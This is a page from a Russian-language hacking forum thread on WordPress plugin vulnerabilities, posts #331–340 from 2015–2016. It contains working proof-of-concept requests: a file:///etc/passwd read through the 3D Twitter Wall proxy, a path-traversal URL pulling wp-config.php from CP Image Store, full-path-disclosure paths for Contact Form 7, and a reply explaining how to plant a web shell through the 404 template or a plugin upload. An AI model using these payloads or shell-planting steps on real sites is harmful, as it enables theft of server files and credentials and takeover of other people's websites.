HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #331  
Старый 21.06.2015, 17:47
blackbox
Постоянный
Регистрация: 31.12.2011
Сообщений: 362
С нами: 7561046

Репутация: 11
По умолчанию

Цитата:
Сообщение от winstrool  
я тоже не совсем понял, можно просто регистр в расширении другой поставить и тогда такой файл пройдет?
 
Ответить с цитированием

  #332  
Старый 21.06.2015, 22:49
avin
Участник форума
Регистрация: 04.07.2011
Сообщений: 103
С нами: 7820246

Репутация: 2
По умолчанию

Цитата:
Сообщение от blackbox  

я тоже не совсем понял, можно просто регистр в расширении другой поставить и тогда такой файл пройдет?
да, пройдет
 
Ответить с цитированием

  #333  
Старый 10.07.2015, 10:16
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами: 9752260

Репутация: 150
По умолчанию

WP 3D Twitter Wall

Код:
# Vendor: https://wordpress.org/plugins/3d-twitter-wall/
#/wp-content/plugins/3d-twitter-wall/proxy.php

$url = ($_POST['url']) ? $_POST['url'] : $_GET['url'];
...
$session = curl_init($url);    // $url = $_GET['url'] OR $_POST['url']
...
$response = curl_exec($session);
echo $response;
curl_close($session);
POC: _http://example.com/plugins/3d-twitte...:///etc/passwd
 
Ответить с цитированием

  #334  
Старый 14.07.2015, 12:48
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию

WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]

Код:
# Exploit Title: WordPress CP Image Store with Slideshow 1.0.5  [Arbitrary file download vulnerability]
# Date: 2015-07-10
# Google Dork:
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
# Version: 1.0.5
# Tested on: windows 7 + firefox.

====================
DESCRIPTION
====================

A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5 .
The vulnerability allows remote attackers to download arbitrary files from the server.
The Arbitrary file download vulnerability is located in the `cp-image-store.php` file.

The web vulnerability can be exploited by remote attackers without privileged application user account
and without required user interaction. Successful exploitation of the Arbitrary file download vulnerability results
in application compromise.

==============
POC
==============

   # http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php HTTP/1.1
  
   the purchase_id parameter can be bruteforced and succesfully exploit this vulnerability.

  
==================
VULNERABLE CODE
==================

Located in cp-image-store.php

function cpis_download_file(){
    ...
       
    if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
        header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
        header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
        if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
            readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] );
        }else{
            @unlink( CPIS_DOWNLOAD.'/.htaccess');
            header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
        }
    ...
}
 
Ответить с цитированием

  #335  
Старый 03.08.2015, 12:17
PoizOn
Новичок
Регистрация: 06.06.2006
Сообщений: 2
С нами: 10488992

Репутация: 3
По умолчанию

Вот интересная бага:

http://seclists.org/fulldisclosure/2015/Feb/75

Но я до чего-то вразумительтного ее не докрутил

admin.php?page=wc-reports&";>

admin.php?page=wc-reports&";>WOW
 
Ответить с цитированием

  #336  
Старый 07.12.2015, 06:30
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию

 
Ответить с цитированием

  #337  
Старый 04.02.2016, 17:44
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами: 9752260

Репутация: 150
По умолчанию

Contact form 7


Full Path Disclosure

wp-content/plugins/contact-form-7/includes/upgrade.php

/wp-content/plugins/contact-form-7/modules/acceptance.php

/wp-content/plugins/contact-form-7/modules/akismet.php

/wp-content/plugins/contact-form-7/modules/checkbox.php

/wp-content/plugins/contact-form-7/modules/count.php

/wp-content/plugins/contact-form-7/modules/date.php

/wp-content/plugins/contact-form-7/modules/file.php

/wp-content/plugins/contact-form-7/modules/flamingo.php

/wp-content/plugins/contact-form-7/modules/jetpack.php

/wp-content/plugins/contact-form-7/modules/listo.php

/wp-content/plugins/contact-form-7/modules/number.php

/wp-content/plugins/contact-form-7/modules/quiz.php

/wp-content/plugins/contact-form-7/modules/really-simple-captcha.php

/wp-content/plugins/contact-form-7/modules/recaptcha.php

/wp-content/plugins/contact-form-7/modules/response.php

/wp-content/plugins/contact-form-7/modules/select.php

/wp-content/plugins/contact-form-7/modules/submit.php

/wp-content/plugins/contact-form-7/modules/text.php

/wp-content/plugins/contact-form-7/modules/textarea.php
 
Ответить с цитированием

  #338  
Старый 08.03.2016, 13:31
grimnir
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами: 7396886

Репутация: 231


По умолчанию

https://github.com/rastating/wordpre...loit-framework

Ruby фреймворк для эскплутации и тестирования WP

статья на английском

http://www.kitploit.com/2016/03/word...work-ruby.html
 
Ответить с цитированием

  #339  
Старый 20.04.2016, 14:17
R3hab
Участник форума
Регистрация: 17.05.2015
Сообщений: 117
С нами: 5785526

Репутация: 6
По умолчанию

какие методы есть заливки шелла в wp?
 
Ответить с цитированием

  #340  
Старый 20.04.2016, 15:52
powerOfthemind
Познающий
Регистрация: 31.07.2015
Сообщений: 41
С нами: 5677526

Репутация: 1
По умолчанию

Цитата:
Сообщение от R3hab  

какие методы есть заливки шелла в wp?
Смотря какие у тебя права в админк, если можешь редактировать шаблон то в страницу 404 пихаешь код шела и радуешься или через загрузку плагина, пакуешь в архив шел и льеш на сайт.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей SLAED CMS ] _kREveDKo_ Веб-уязвимости 20 01.11.2009 14:28
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.